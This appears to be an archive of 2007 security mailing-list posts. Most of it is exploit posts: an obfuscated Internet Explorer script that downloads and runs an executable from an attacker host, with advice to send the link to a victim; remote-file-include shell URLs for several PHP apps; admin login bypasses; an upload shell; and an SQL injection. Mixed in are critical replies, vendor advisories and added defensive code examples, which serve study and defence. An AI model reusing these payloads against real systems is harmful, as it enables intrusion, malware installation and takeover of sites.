Re: Exploit In Internet Explorer
[EMAIL PROTECTED] wrote:

> Discovred By : Hasadya Raed

"Discovred" as in "found in a web page with some dodgy script in it"?

This exploit (though not in this precise form) is common as muck in them thar int-duh-net tubes at the moment...

You can't mean "discovered" as in "first found through unique personal research/investigation/etc" as this exploit has been publicly disclosed since April 2006, I think (and privately used previously?):

   http://www.milw0rm.com/exploits/2052

and again, in a more elaborate "multiple dodgy ActiveX control target" version shortly thereafter:

   http://www.milw0rm.com/exploits/2164

> Now You Can To Download Exe Files And To Run Without Msgs :

Oh, and did I mention patched since 11 April 2006:

   http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx

So probably not that effective if what you want is an assured "fire and forget" remote IE exploit...

Regards,

Nick FitzGerald
RE: Exploit In Internet Explorer
I get the browser warning bar: "This web site wants to run the following add-on: 'Microsoft Data Access - Remote Data Services Dat...' from 'Microsoft Corporation'. If you trust the web site and the add-on and want to allow it to run, click here..." Looks like a message to me. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.eweek.com/cheap_hack/ Contributing Editor, PC Magazine [EMAIL PROTECTED] -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Sent: Sunday, July 29, 2007 4:58 AM To: bugtraq@securityfocus.com Subject: Exploit In Internet Explorer Discovred By : Hasadya Raed Contact : [EMAIL PROTECTED] - Israel --- Now You Can To Download Exe Files And To Run Without Msgs : Exploit : var dc=document.write; var sc=String.fromCharCode; var exe="http://www.Attacker.com/sever.exe";; dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,4 4,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) + exe + sc(34,59,122,104,97,110,61,34,119,105,110,46,101,120,101,34,59,99,109,10 0,115,115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,1 14,32,97,100,111,61,40,100,111,99,117,109,101,110,116,46,99,114,101,97,1 16,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,41,5 9,118,97,114,32,100,61,49,59,97,100,111,46,115,101,116,65,116,116,114,10 5,98,117,116,101,40,34,99,108,97,115,115,105,100,34,44,34,99,108,115,105 ,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,5 1,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,41,59,118,97,114,32,101,6 1,49,59,118,97,114,32,120,109,108,61,97,100,111,46,67,114,101,97,116,101 ,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,7 6,72,84,84,80,34,44,34,34,41,59,118,97,114,32,102,61,49,59,118,97,114,32 ,108,110,61,34,65,100,111,34,59,118,97,114,32,1 08,122,110,61,34,100,98,46,83,116,34,59,118,97,114,32,97,110,61,34,114,1 01,97,109,34,59,118,97,114,32,103,61,49,59,118,97,114,32,97,115,61,97,10 
0,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,108,110,43,108,1 22,110,43,97,110,44,34,34,41,59,118,97,114,32,104,61,49,59,120,109,108,4 6,79,112,101,110,40,34,71,69,84,34,44,97,105,108,105,97,110,44,48,41,59, 120,109,108,46,83,101,110,100,40,41,59,97,115,46,116,121,112,101,61,49,5 9,118,97,114,32,110,61,49,59,97,115,46,111,112,101,110,40,41,59,97,115,4 6,119,114,105,116,101,40,120,109,108,46,114,101,115,112,111,110,115,101, 66,111,100,121,41,59,97,115,46,115,97,118,101,116,111,102,105,108,101,40 ,122,104,97,110,44,50,41,59,97,115,46,99,108,111,115,101,40,41,59,118,97 ,114,32,115,104,101,108,108,61,97,100,111,46,99,114,101,97,116,101,111,9 8,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,11 6,105,111,110,34,44,34,34,41,59,115,104,101,108,108,46,83,104,101,108,10 8,69,120,101,99,117,116,101,40,122,104,97,110,44,34,3 4,44,34,34,44,34,111,112,101,110,34,44,48,41,59,115,104,101,108,108,46,8 3,104,101,108,108,69,120,101,99,117,116,101,40,99,109,100,115,115,44,34, 32,47,99,32,100,101,108,32,47,83,32,47,81,32,47,70,32,34,43,122,104,97,1 10,44,34,34,44,34,111,112,101,110,34,44,48,41,59,125,99,97,116,99,104,40 ,101,41,123,125,59,60,47,115,99,114,105,112,116,62)); ;By Fox TeaM - Save As Html File , And Send The Link To Victim - By Hasadya Raed - Israel
Re: Exploit In Internet Explorer
[EMAIL PROTECTED] wrote:
> Discovred By : Hasadya Raed
> Contact : [EMAIL PROTECTED] - Israel
> ---
> Now You Can To Download Exe Files And To Run Without Msgs :
>
> Exploit :
[bla bla bla]

That's old, man... already recognized by all security software and protected against, as far as I know.
RFI ====> vBulletin v3.6.5
By Hasadya Raed
Contact : [EMAIL PROTECTED] - Israel
Greetz : -Fairoz-
---
vBulletin v3.6.5
Dork : "Powered by vBulletin v3.6.5. Copyright ©2000 - 2007 "
---
Exploits :
Http://WWW.Victim.Com/vb/includes/functions.php?classfile=[Shell-Attack]
Http://WWW.Victim.Com/vb/includes/functions_cron.php?nextitem=[Shell-Attack]
Http://WWW.Victim.Com/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack]

Discovered By Hasadya Raed
Have A Good Time
Exploit In Internet Explorer
Discovred By : Hasadya Raed Contact : [EMAIL PROTECTED] - Israel --- Now You Can To Download Exe Files And To Run Without Msgs : Exploit : var dc=document.write; var sc=String.fromCharCode; var exe="http://www.Attacker.com/sever.exe";; dc(sc(60,115,99,114,105,112,116,62,118,97,114,32,97,105,108,105,97,110,44,122,104,97,110,44,99,109,100,115,115,59,97,105,108,105,97,110,61,34) + exe + sc(34,59,122,104,97,110,61,34,119,105,110,46,101,120,101,34,59,99,109,100,115,115,61,34,99,109,100,46,101,120,101,34,59,116,114,121,123,118,97,114,32,97,100,111,61,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,111,98,106,101,99,116,34,41,41,59,118,97,114,32,100,61,49,59,97,100,111,46,115,101,116,65,116,116,114,105,98,117,116,101,40,34,99,108,97,115,115,105,100,34,44,34,99,108,115,105,100,58,66,68,57,54,67,53,53,54,45,54,53,65,51,45,49,49,68,48,45,57,56,51,65,45,48,48,67,48,52,70,67,50,57,69,51,54,34,41,59,118,97,114,32,101,61,49,59,118,97,114,32,120,109,108,61,97,100,111,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,34,44,34,34,41,59,118,97,114,32,102,61,49,59,118,97,114,32,108,110,61,34,65,100,111,34,59,118,97,114,32,1 
08,122,110,61,34,100,98,46,83,116,34,59,118,97,114,32,97,110,61,34,114,101,97,109,34,59,118,97,114,32,103,61,49,59,118,97,114,32,97,115,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,108,110,43,108,122,110,43,97,110,44,34,34,41,59,118,97,114,32,104,61,49,59,120,109,108,46,79,112,101,110,40,34,71,69,84,34,44,97,105,108,105,97,110,44,48,41,59,120,109,108,46,83,101,110,100,40,41,59,97,115,46,116,121,112,101,61,49,59,118,97,114,32,110,61,49,59,97,115,46,111,112,101,110,40,41,59,97,115,46,119,114,105,116,101,40,120,109,108,46,114,101,115,112,111,110,115,101,66,111,100,121,41,59,97,115,46,115,97,118,101,116,111,102,105,108,101,40,122,104,97,110,44,50,41,59,97,115,46,99,108,111,115,101,40,41,59,118,97,114,32,115,104,101,108,108,61,97,100,111,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,122,104,97,110,44,34,3 4,44,34,34,44,34,111,112,101,110,34,44,48,41,59,115,104,101,108,108,46,83,104,101,108,108,69,120,101,99,117,116,101,40,99,109,100,115,115,44,34,32,47,99,32,100,101,108,32,47,83,32,47,81,32,47,70,32,34,43,122,104,97,110,44,34,34,44,34,111,112,101,110,34,44,48,41,59,125,99,97,116,99,104,40,101,41,123,125,59,60,47,115,99,114,105,112,116,62)); ;By Fox TeaM - Save As Html File , And Send The Link To Victim - By Hasadya Raed - Israel
BellaBiblio Admin Login Bypass
BellaBiblio Admin Login Bypass

SCRIPT: BellaBiblio
DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip
AUTHOR: ilker kandemir

Bug in (admin.php):

if (isset($_COOKIE['bellabiblio'])) {
    if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) {
        if (isset($_GET['ap'])) $page = $_GET['ap']; else $page = "";

EXPLOIT:
Set your cookie: bellabiblio=administrator
http://site.com/admin.php
And you have full admin access
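The post above shows an admin check that trusts a cookie whose value is a fixed digest of the admin's name, password and a secret: the same value for every login, never expiring, and compared with a loose `==`. The following is an added example (not BellaBiblio code) of the server-side design that avoids that class of bug: the cookie carries only a random session id with no meaning of its own, and the privilege, plus an expiry, lives in a server-side table. The `clock` parameter and the `TTL` value are assumptions made for testability.

```python
import secrets
import time


class AdminSessions:
    """Server-side admin sessions: the browser holds a random id, the server holds the authority."""

    TTL = 3600  # seconds; constructed value for this example

    def __init__(self, clock=time.time):
        self._clock = clock          # injectable clock so expiry can be tested deterministically
        self._store = {}             # session id -> expiry timestamp

    def issue(self):
        """Create a session. Call this only after the admin's credentials have been verified."""
        sid = secrets.token_urlsafe(32)        # 256 bits of CSPRNG output; not derivable from any password
        self._store[sid] = self._clock() + self.TTL
        return sid

    def is_admin(self, cookie_value):
        """True only for an id this server issued and that has not expired.

        A guessed value such as 'administrator' is simply absent from the table; there is
        no formula a client could reproduce because nothing about the value is derived.
        """
        if not cookie_value:
            return False
        expiry = self._store.get(cookie_value)
        if expiry is None:
            return False
        if expiry <= self._clock():
            del self._store[cookie_value]      # expired: forget it so it cannot be replayed later
            return False
        return True

    def logout(self, cookie_value):
        """Explicit revocation, which a deterministic md5-of-credentials cookie cannot offer."""
        self._store.pop(cookie_value, None)
```

Because the id is random and stored server-side, revoking admin access is a table delete, and rotating the password does not silently keep every old cookie valid.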
Dora Emlak Script v1.0 (tr) Admin Login ByPass
# Dora Emlak Script v1.0 (tr) Admin Login ByPass
# ilker kandemir
# Download: http://aspindir.com/goster/5027
# TnX.: Ajann, Dumenci, H0tTurk, Str0ke
# # # # # # # # # # # # # # # # # # # # # # # # #
# Bug in ../dora/administartor/yonetim/patron/default.asp

<%
cookFirstLevel = Session("FirstLevelSecurity")      'First-level security session
cookSecondLevel = Session("SecondLevelSecurity")    'Second-level security session
queryProc = Request.QueryString("Proc")             'Query string definition
strPageURL = Replace("/" & Request.ServerVariables("URL"),"//","/")   'This page's address
strFirstPass = "sifre1"
strSecondPass = "sifre2"
If fixWord(queryProc) = "" Then                     'If the query is empty (a normal page load)
If cookFirstLevel <> 1 and cookSecondLevel <> 1 Then   'If the level 1 and level 2 sessions both differ from 1
%>

# # # # # # # # # # # # # # # # # # # # # # # # #
# Admin Login Panel: /administartor/yonetim/patron/admin.asp
# First Login Pass: sifre1
# Second Login Pass: sifre2
# # # # # # # # # # # # # # # # # # # # # # # # #
phpVoter v0.6 Remote File Include Vulnerability
# # # # # # # # # # # # # # # # # # # # # # # # #
# phpVoter v0.6 Remote File Include Vulnerability
# ilker kandemir
# Download: http://jxdevelopment.com/downloads/phpscripts/phpvoter-0_6.zip
# TnX.: Ajann, Dumenci, H0tTurk, Str0ke
# # # # # # # # # # # # # # # # # # # # # # # # #
# Exploit:
includes/functions.inc.php?sitepath=http://shell.txt?
# # # # # # # # # # # # # # # # # # # # # # # # #
Phorm v3.0 Remote File Upload Vulnerability
# # # # # # # # # # # # # # # # # # # # # # # # #
# Phorm v3.0 Remote File Upload Vulnerability
# ilker kandemir
# Download: ftp://ftp.holotech.net/phorm/phorm.zip
# TnX.: Ajann, Dumenci, H0tTurk, Str0ke
# # # # # # # # # # # # # # # # # # # # # # # # #
# Exploit:
http://[site]/[phorm_path]/lib/fileupload.php   [+]=>> upload your shell.php
# http://[site]/[phorm_path]/files/phpshell.php
# # # # # # # # # # # # # # # # # # # # # # # # #
Madoa Poll v1.1 Remote File Include Vulnerabilities
# Madoa Poll v1.1 Remote File Include Vulnerabilities
# ilker kandemir
# info: */ Everything for the homeland /*
# Download: http://www.finnermark.se/madoa/Madoa_poll1_1.zip
# TnX.: Ajann, Dumenci, H0tTurk, Str0ke
# Bug:
require ($Madoa . "config.php");
# Exploit:
index.php?Madoa=http://sheel.txt?
vote.php?Madoa=http://sheel.txt?
admin.php?Madoa=http://shell.txt?
phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability
---
MEFISTO PreSents...

Script: phpWebFileManager v0.5
Script Download: http://platon.sk/projects/download.php?id=2
Contact: ilker Kandemir

Code:
require_once $PN_PathPrefix . 'functions.inc.php';   << it's not defined
---
Exploit:
index.php?PN_PathPrefix=http://attacker.txt?
---
Tnx: H0tturk, Ajann, Dumenci, Str0ke
RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability
---
MEFISTO PreSents...

Script: RIG Image Gallery
Script Download: http://sourceforge.net/project/showfiles.php?group_id=54367
Contact: ilker Kandemir

Code:
require_once(rig_check_src_file($dir_abs_src . "entry_point.php"));
---
Exploit:
check_entry.php?dir_abs_src=http://attacker.php?
---
Tnx: H0tturk, Ajann, Dumenci, Str0ke
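The remote-file-include posts above (vBulletin, phpVoter, Madoa Poll, phpWebFileManager, RIG Image Gallery) all share one request shape: a PHP include variable carries a URL, usually ending in `?` so that whatever the script appends (`config.php`, `entry_point.php`) turns into a query string on the remote host. The detector below is an added example, not code from any of those projects, that scans web server access logs for that shape without needing to know the parameter names in advance. The log lines are constructed for the example, with addresses from documentation ranges, and the severity labels are an assumption of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Common Log Format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [30/Jul/2007:10:00:01 +0000] "GET /vb/includes/functions.php?classfile=http://203.0.113.9/shell.txt? HTTP/1.1" 200 512
10.0.0.7 - - [30/Jul/2007:10:00:02 +0000] "GET /index.php?Madoa=ftp://203.0.113.9/s.txt%3F HTTP/1.1" 200 311
10.0.0.8 - - [30/Jul/2007:10:00:03 +0000] "GET /check_entry.php?dir_abs_src=../../../../etc/passwd%00 HTTP/1.1" 200 90
10.0.0.9 - - [30/Jul/2007:10:00:04 +0000] "GET /vb/forumdisplay.php?f=12&page=2 HTTP/1.1" 200 8192
10.0.0.9 - - [30/Jul/2007:10:00:05 +0000] "GET /search.php?q=http://example.com/docs HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Schemes PHP's include() will happily fetch when allow_url_include / fopen wrappers are on.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftps?|php|data)://', re.IGNORECASE)
# Local-file variants of the same bug: directory traversal or null-byte truncation.
TRAVERSAL_RE = re.compile(r'\.\./|\x00')


def classify_value(value):
    """Return 'high', 'low' or None for one URL-decoded parameter value."""
    if TRAVERSAL_RE.search(value):
        return "high"
    if REMOTE_SCHEME_RE.match(value):
        # A URL ending in '?' is the RFI idiom: the script's appended filename becomes a
        # query string on the attacker's host. A bare URL in a parameter is only worth review.
        return "high" if value.rstrip().endswith("?") else "low"
    return None


def scan(log_text):
    """Yield one finding per suspicious parameter across all parseable log lines."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not CLF; skip rather than guess
        parts = urlsplit(m.group("path"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            severity = classify_value(value)
            if severity:
                findings.append({"ip": m.group("ip"), "script": parts.path,
                                 "param": name, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:4} {f['ip']:10} {f['script']} param={f['param']}")
```

`parse_qsl` does the percent-decoding, so `%3F` and `%00` are judged on their decoded form; the fourth sample line (ordinary forum parameters) produces nothing, and the fifth (a URL used as data) is reported at low severity rather than dropped.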
[SECURITY] [DSA 1342-1] New xfs packages fix privilege escalation
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1342-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                          Moritz Muehlenhoff
July 30th, 2007                         http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : xfs
Vulnerability  : race condition
Problem-Type   : local
Debian-specific: no
CVE ID         : CVE-2007-3103

It was discovered that a race condition in the init.d script of the X Font Server allows the modification of file permissions of arbitrary files if the local administrator can be tricked into restarting the X font server.

For the oldstable distribution (sarge) xfs is present as part of the monolithic xfree86 package. A fix will be provided along with a future security update.

For the stable distribution (etch) this problem has been fixed in version 1.0.1-6.

For the unstable distribution (sid) this problem has been fixed in version 1.0.4-2.

We recommend that you upgrade your xfs package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6.dsc
    Size/MD5 checksum:      794 938a05eb2b1638fc49b4d7101084c69b
  http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6.diff.gz
    Size/MD5 checksum:    28440 0eeacd5783c66b937eaa1dbde6145401
  http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1.orig.tar.gz
    Size/MD5 checksum:   174623 32e8b6b24ec3d4c0de11d81061640cc2

Alpha architecture:

  http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_alpha.deb
    Size/MD5 checksum:    75520 0becb7909f5d9df1621d1a8b153eab2b

AMD64 architecture:

  http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_amd64.deb
    Size/MD5 checksum:    65224 632e1a2416a91e079fe16f19f8c18f37

ARM architecture:

  http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_arm.deb
    Size/MD5 checksum:    61330 41a50afe7ca54708028f8929ef9f62a8

HP Precision architecture:

  http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_hppa.deb
    Size/MD5 checksum:    68312 31b1450c324283337298f0671491eddd

Intel IA-32 architecture:

  http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_i386.deb
    Size/MD5 checksum:    56856 40191532dd37541d09a9ff62bf9e6189

Intel IA-64 architecture:

  http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_ia64.deb
    Size/MD5 checksum:    97348 31aacc8828c1dc532db8d5b630de5f5c

Big endian MIPS architecture:

  http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_mips.deb
    Size/MD5 checksum:    69112 c0797a23074512e31edeef83a57817b5

Little endian MIPS architecture:

  http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_mipsel.deb
    Size/MD5 checksum:    69032 3a44f04fd9e3f4b84fd03889bcebeb56

PowerPC architecture:

  http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_powerpc.deb
    Size/MD5 checksum:    64512 00d156e38ef0cf5f5257ae90cef496a2

IBM S/390 architecture:

  http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_s390.deb
    Size/MD5 checksum:    67514 710d362f9183b98f817736e466c89d35

Sun Sparc architecture:

  http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6_sparc.deb
    Size/MD5 checksum:    57382 8a32daa22fd7630ff4101e21a4cfaf7d

These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGrjNiXm3vHE4uyloRAhvlAJ4nmQhLJ6wDlPAERwZzjpYpxkZ16wCfYlXi
PaqM+Ogp8Y8Ad+BI11/VjtU=
=f8Uy
-----END PGP SIGNATURE-----
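The advisory's manual upgrade path (wget the .deb, dpkg -i it) relies on the reader checking the listed size and MD5 before installing. The following is an added example, not Debian tooling, that parses the "URL / Size/MD5 checksum" pairs out of advisory text and verifies a downloaded file against them. The excerpt uses two entries exactly as they appear in the advisory above; the file bytes in the test are constructed, so the digest is computed rather than taken from the advisory.

```python
import hashlib
import re

# Matches "<url> Size/MD5 checksum: <size> <md5>" whether or not extraction kept the spacing.
CHECKSUM_RE = re.compile(
    r"(?P<url>https?://\S+)\s+Size/MD5 checksum:\s*(?P<size>\d+)\s+(?P<md5>[0-9a-f]{32})"
)

# Two entries copied from DSA 1342-1 above (source archives section).
ADVISORY_EXCERPT = """\
http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6.dsc Size/MD5 checksum: 794 938a05eb2b1638fc49b4d7101084c69b
http://security.debian.org/pool/updates/main/x/xfs/xfs_1.0.1-6.diff.gz Size/MD5 checksum:28440 0eeacd5783c66b937eaa1dbde6145401
"""


def parse_checksums(advisory_text):
    """Map each listed URL to its (size, md5) pair."""
    return {
        m.group("url"): (int(m.group("size")), m.group("md5"))
        for m in CHECKSUM_RE.finditer(advisory_text)
    }


def verify_package(data, expected_size, expected_md5):
    """Cheap size check first, then the digest. Both must match before dpkg -i is run."""
    if len(data) != expected_size:
        return False
    return hashlib.md5(data).hexdigest() == expected_md5.lower()


def verify_download(path, url, checksums):
    """Verify a file on disk against the advisory entry for its URL; KeyError if unlisted."""
    size, digest = checksums[url]
    with open(path, "rb") as fh:
        return verify_package(fh.read(), size, digest)
```

MD5 here guards against a truncated or corrupted download rather than a deliberate substitution; for that, the apt path with its signed Release file is the stronger route, which is why the advisory's footer points at the security.debian.org sources.list entry.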
[DRUPAL-SA-2007-017] Drupal 5.2 fixes multiple CSRF vulnerabilities
Drupal security advisory DRUPAL-SA-2007-017

Project: Drupal core
Version: 5.x
Date: 2007-July-26
Security risk: Moderately critical
Exploitable from: Remote
Vulnerability: Multiple cross site request forgeries

Description
-----------
Several parts in Drupal core are not protected against cross site request forgeries [1] due to improper use of the Forms API, or by taking action solely on GET requests. Malicious users are able to delete comments and content revisions and disable menu items by enticing a privileged user to visit certain URLs while the victim is logged in to the targeted site.

Versions affected
-----------------
- Drupal 5.x versions before Drupal 5.2

Solution
--------
If you are running Drupal 5.x then upgrade to Drupal 5.2.
http://ftp.drupal.org/files/projects/drupal-5.2.tar.gz

Drupal 4.7.x is not affected.

If you are unable to upgrade immediately, you can apply a patch to secure your installation until you are able to do a proper upgrade.
- To patch Drupal 5.1 use http://drupal.org/files/sa-2007-017/SA-2007-017-5.1.patch.

Please note that the patches only contain changes related to this advisory, and do not fix bugs that were solved in 5.1.

Reported by
-----------
Konstantin Käfer reported the menu issue.
The Drupal security team.

Contact
-------
The security contact for Drupal can be reached at security at drupal.org or using the form at http://drupal.org/contact.

// Heine Deelstra, on behalf of the Drupal Security Team.
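The advisory names two distinct defects: actions taken on a bare GET, and forms whose token check was bypassed by improper Forms API use. The following is an added example, not Drupal code, of a minimal dispatcher that enforces both rules for the three actions the advisory lists. The path prefixes, the server secret and the request shape are assumptions of this example; the token construction (an HMAC over the session id) is the usual pattern, not a description of Drupal's own implementation.

```python
import hashlib
import hmac

SERVER_SECRET = b"constructed-secret-for-this-example"   # a deployment keeps its own, private

# Placeholder path prefixes standing in for the delete/disable actions the advisory names.
STATE_CHANGING_PREFIXES = ("comment/delete/", "node/revisions/delete/", "menu/disable/")


def form_token(session_id):
    """Per-session token: an HMAC over the session id.

    A page on another origin can make the victim's browser send the session cookie,
    but it cannot read the token out of the legitimate form, and it cannot compute it
    without SERVER_SECRET.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def token_valid(session_id, presented):
    return bool(presented) and hmac.compare_digest(form_token(session_id), presented)


def dispatch(method, path, session_id, form):
    """Return an HTTP status. State changes need POST and a valid per-session token."""
    if path.startswith(STATE_CHANGING_PREFIXES):
        if method != "POST":
            return 405          # a link, image tag or redirect alone must never trigger the action
        if not token_valid(session_id, form.get("form_token")):
            return 403          # the token check; skipping it is the "improper Forms API use" case
    return 200                  # read-only paths are unaffected
```

The rendered delete form embeds `form_token(session_id)` in a hidden field; the confirmation step the advisory's fix restores is exactly this POST-plus-token round trip, so a crafted URL the victim merely visits ends at the 405.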
[DRUPAL-SA-2007-018] Drupal 4.7.7 and 5.2 fix multiple cross site scripting vulnerabilities
Drupal security advisory DRUPAL-SA-2007-018

Project: Drupal core
Version: 4.7.x, 5.x
Date: 2007-July-26
Security risk: Moderately critical
Exploitable from: Remote
Vulnerability: Multiple cross site scripting vulnerabilities

Description
-----------
Some server variables are not escaped consistently. When a malicious user is able to entice a victim to visit a specially crafted link or webpage, arbitrary HTML and script code can be injected and executed in the context of the victim's session on the targeted website.

Custom content type names are not escaped consistently. A malicious user with the 'administer content types' permission would be able to inject and execute arbitrary HTML and script code on the website. Revoking the 'administer content types' permission provides an immediate workaround.

Both vulnerabilities are known as cross site scripting.

Versions affected
-----------------
- Drupal 4.7.x versions before Drupal 4.7.7
- Drupal 5.x versions before Drupal 5.2

Solution
--------
- If you are running Drupal 4.7.x then upgrade to Drupal 4.7.7.
  http://ftp.drupal.org/pub/drupal/files/projects/drupal-4.7.7.tar.gz
- If you are running Drupal 5.x then upgrade to Drupal 5.2.
  http://ftp.drupal.org/pub/drupal/files/projects/drupal-5.2.tar.gz

If you are unable to upgrade immediately, you can apply a patch to secure your installation until you are able to do a proper upgrade.
- To patch Drupal 4.7.6 use http://drupal.org/files/sa-2007-018/SA-2007-018-4.7.6.patch.
- To patch Drupal 5.1 use http://drupal.org/files/sa-2007-018/SA-2007-018-5.1.patch.

Please note that the patches only contain changes related to this advisory, and do not fix bugs that were solved in 4.7.7 or 5.2.

Important note
--------------
The configuration file settings.php is one of the files containing vulnerable code. It is therefore critical to replace all of your sites' settings.php files in subdirectories of sites with the new one from the archive.

After you have replaced the files, make sure to edit the value of the $db_url variable to be identical to the value in your old settings.php. This is the information that determines how Drupal connects to a database.

Reported by
-----------
- The server variables issue was reported by David Caylor.
- Content type naming issues were reported by Karthik.

Thanks
------
The security team wishes to thank Dave, Morten Wulff, Brenda Wallace, Fernando Silva, Gerhard Killesreiter, Brandon Bergren, Bart Janssen and Neil Drumm for technical assistance.

Contact
-------
The security contact for Drupal can be reached at security at drupal.org or using the form at http://drupal.org/contact.
FLEA-2007-0036-1 vim vim-minimal gvim
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0036-1
Published: 2007-07-30
Rating: Moderate

Updated Versions:
    vim=/[EMAIL PROTECTED]:1-devel//1/7.1.044-1-1
    vim-minimal=/[EMAIL PROTECTED]:1-devel//1/7.1.044-1-1
    gvim=/[EMAIL PROTECTED]:1-devel//1/7.1.044-1-1
    group-dist=/[EMAIL PROTECTED]:1-devel//1/1.3.2-0.6-5

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2953
    https://issues.rpath.com/browse/RPL-1595

Description:
    Previous versions of the vim package are vulnerable to a user-assisted attack in which vim may execute arbitrary code when helptags is run on data that has been maliciously crafted.

- ---
Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.4 (GNU/Linux)

iQIVAwUBRq4WkNfwEn07iAtZAQIdHA//RuhxXhkOlpo5yMN4jBOC9nq91pe+oB1q
NxZLgzaarAJYOj3Cx8KS/M/slDhnePAIxZBl14TVr2SKtHHiNMEA788lkq0Dlw1u
j1GpCff0S5lR0BwpvhEQOA8nMCCS91Jb3sXFom5Z7d9qSZ5Ne4Iwq9fk/h6TRgFk
3I0HVMXPRY2AVxAF1OU3/aPiYDqr/fJyurRaYrkHSzMu9eUm6qZ9aBgzJ3SB0CDR
6IvwsBInhs9jRSqX0gK8TGsg53dxDZ9nbTEM+GstUqWYO21kTutSjcKGq1SKlW9z
Db+t4OBtl6i20K5Qpk1cfEmJPBUmDg6yXVeWt1iKIy9dv9NHHvz4LSmsMmSpdbqn
LyWwTP0BfEV5hHGwwDy8IJx66IRImnOTjRUiuOIMq/+B9jnQZCoZk/9XhxmNeElT
dCfRnfFNeM4/Vp+i3d2E7yvkjSZlG5XVLA5Ha+VARrWti/6J/RWXcYRwvhO+QNHz
7Wm5Q8Tza/1is0EmhnejhYolMU3FiPGOnTj5KC92vn2wF1OiS400NKdSbGX8qogi
ihp15IOl4SiPRuUZRM2HA5Ru4MLK5A2G7R8NgWc0CUmGfuzeqCCTFu7c72qcT5AW
gb4YKlAvwEeyA+bxZKhOgo5Nir1A4rbTPkMaIXrORyC5RZASdoEiQeUPMFkEmlEH
bJlpkcoT2+c=
=rMyd
-----END PGP SIGNATURE-----
wolioCMS SQL Injection
# wolioCMS - SQL Injection and Bypass Administrator Login
# Vendor: http://www.buton.web.id/member.php?member=anon
# Download : http://www.buton.web.id/download/woliocms.zip
# Found By : k1tk4t - k1tk4t[4t]newhack.org
# Location : Indonesia -- #newhack[dot]org @irc.dal.net

This exploit works if 'magic_quotes_gpc = off'

file; /common.php
bug at line 73;
$sql="select * from pages where pages_id='".$_GET["id"]."' ";

file; /admin/index.php
bug at line 28;
